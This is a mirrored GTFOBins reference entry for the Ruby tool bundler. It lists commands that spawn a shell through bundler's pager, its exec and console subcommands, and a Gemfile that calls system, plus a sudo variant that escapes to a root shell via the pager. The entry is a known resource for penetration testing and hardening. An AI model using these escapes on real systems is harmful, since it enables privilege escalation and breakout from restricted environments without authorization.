mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 07:49:17 +01:00
34 lines
929 B
Markdown
34 lines
929 B
Markdown
---
|
|
functions:
|
|
shell:
|
|
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
|
code: |
|
|
bundler help
|
|
!/bin/sh
|
|
- code: |
|
|
export BUNDLE_GEMFILE=x
|
|
bundler exec /bin/sh
|
|
- code: |
|
|
TF=$(mktemp -d)
|
|
touch $TF/Gemfile
|
|
cd $TF
|
|
bundler exec /bin/sh
|
|
- description: This spawns an interactive shell via [`irb`](/gtfobins/irb/).
|
|
code: |
|
|
TF=$(mktemp -d)
|
|
touch $TF/Gemfile
|
|
cd $TF
|
|
bundler console
|
|
system('/bin/sh -c /bin/sh')
|
|
- code: |
|
|
TF=$(mktemp -d)
|
|
echo 'system("/bin/sh")' > $TF/Gemfile
|
|
cd $TF
|
|
bundler install
|
|
sudo:
|
|
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
|
code: |
|
|
sudo bundler help
|
|
!/bin/sh
|
|
---
|